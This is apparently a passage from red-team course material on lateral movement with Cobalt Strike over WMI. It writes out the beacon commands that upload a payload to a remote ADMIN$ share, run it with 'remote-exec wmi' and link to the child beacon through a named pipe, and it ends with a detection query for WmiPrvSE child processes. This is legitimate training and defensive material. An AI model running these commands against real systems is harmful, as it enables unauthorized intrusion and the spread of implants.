Windows Management Instrumentation (WMI)

As you may have noticed, WMI is not part of the jump command but it is part of remote-exec. The remote-exec method uses WMI's "process call create" to execute any command we specify on the target. The most straight forward means of using this is to upload a payload to the target system and use WMI to execute it.

You can upload a file to a remote machine by cd'ing to the desired UNC path and then use the upload command.

beacon> cd \\\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe
beacon> remote-exec wmi C:\Windows\smb_x64.exe
Started process 3280 on


The process is now running on WEB so now we need to connect to it.

beacon> link TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon:


As with WinRM, the process will be running in an elevated context of the calling user.


When a binary is executed via WMI in this way, it will be a child of WmiPrvSE.exe. We can therefore look for process create events where WmiPrvSE is the parent.

event.category: process and event.type: start and WmiPrvSE.exe


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